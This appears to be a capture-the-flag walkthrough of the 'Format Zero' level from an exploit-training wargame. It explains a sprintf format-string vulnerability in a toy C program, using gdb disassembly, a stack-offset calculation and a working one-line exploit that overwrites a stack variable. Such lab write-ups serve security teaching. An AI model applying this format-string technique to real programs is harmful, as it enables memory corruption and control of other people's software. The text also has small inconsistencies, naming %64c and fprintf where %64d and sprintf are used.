Format Zero

This level introduces format strings, and how attacker supplied format strings can modify the execution flow of programs.

Hints

  • This level should be done in less than 10 bytes of input.

  • “Exploiting format string vulnerabilities”

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void vuln(char *string)
{
  volatile int target;
  char buffer[64];

  target = 0;

  sprintf(buffer, string);
  
  if(target == 0xdeadbeef) {
      printf("you have hit the target correctly :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}

The program expects one user supplied argument as shown by vuln(argv[1]);.

The code then uses sprintf which is where the vulnerability lies.

## Bugs

Because **sprintf**() and **vsprintf**() assume an arbitrarily long string, callers must be careful not to overflow the actual space; this is often impossible to assure. Note that the length of the strings produced is locale-dependent and difficult to predict. Use **snprintf**() and **vsnprintf**() instead (or **[asprintf](https://linux.die.net/man/3/asprintf)**(3) and **[vasprintf](https://linux.die.net/man/3/vasprintf)**(3)).

Linux libc4.[45] does not have a **snprintf**(), but provides a libbsd that contains an **snprintf**() equivalent to **sprintf**(), that is, one that ignores the _size_ argument. Thus, the use of **snprintf**() with early libc4 leads to serious security problems.

Code such as **printf(**_foo_**);** often indicates a bug, since _foo_ may contain a % character. If _foo_ comes from untrusted user input, it may contain **%n**, causing the **printf**() call to write to memory and creating a security hole.

Before we exploit the program, we need to know how the stack is laid out.

Let's disassemble the vuln function.

(gdb) disass vuln
Dump of assembler code for function vuln:
0x080483f4 <vuln+0>:    push   ebp
0x080483f5 <vuln+1>:    mov    ebp,esp
0x080483f7 <vuln+3>:    sub    esp,0x68
0x080483fa <vuln+6>:    mov    DWORD PTR [ebp-0xc],0x0
0x08048401 <vuln+13>:   mov    eax,DWORD PTR [ebp+0x8]
0x08048404 <vuln+16>:   mov    DWORD PTR [esp+0x4],eax
0x08048408 <vuln+20>:   lea    eax,[ebp-0x4c]
0x0804840b <vuln+23>:   mov    DWORD PTR [esp],eax
0x0804840e <vuln+26>:   call   0x8048300 <sprintf@plt>
0x08048413 <vuln+31>:   mov    eax,DWORD PTR [ebp-0xc]
0x08048416 <vuln+34>:   cmp    eax,0xdeadbeef
0x0804841b <vuln+39>:   jne    0x8048429 <vuln+53>
0x0804841d <vuln+41>:   mov    DWORD PTR [esp],0x8048510
0x08048424 <vuln+48>:   call   0x8048330 <puts@plt>
0x08048429 <vuln+53>:   leave
0x0804842a <vuln+54>:   ret

We can see that the line at vuln+26 makes the call to sprintf.

--snip--;
0x08048408 <vuln+20>:   lea    eax,[ebp-0x4c]
0x0804840b <vuln+23>:   mov    DWORD PTR [esp],eax
0x0804840e <vuln+26>:   call   0x8048300 <sprintf@plt>
--snip--;

The first argument is the address ebp-0x4c and it is loaded into eax.

If we look at the man page of sprintf we can see that the first argument is a pointer to the buffer.

int sprintf(char *restrict s, const char *restrict format, ...);

Looking back at the disassembled code of vuln at vuln+34 a comparison is being made.

--snip--;

0x08048413 <vuln+31>:   mov    eax,DWORD PTR [ebp-0xc]
0x08048416 <vuln+34>:   cmp    eax,0xdeadbeef

--snip--;

This is checking if the target variable is set to 0xdeadbeef. The value being compared is being moved from ebp-0xc.

So we know the location of the buffer as well as the target variable. Let's find the distance between them.

(gdb) p/d 0x4c - 0xc
$1 = 64

So the distance is 64 bytes but we have been instructed to use less than 10 bytes. Which means a classic buffer overflow will not work.

This is where the format string attack comes in.

Instead of submitting 64 bytes of padding we can submit the format string %64c which translates to 64 characters.

When fprintf is executed, it takes the bytes after the format string and overwrites the target variable.

Exploit

$ ./format0 $(python -c 'print "%64d\xef\xbe\xad\xde"')
you have hit the target correctly :)

Note that you can use other format specifiers mentioned here.

Last updated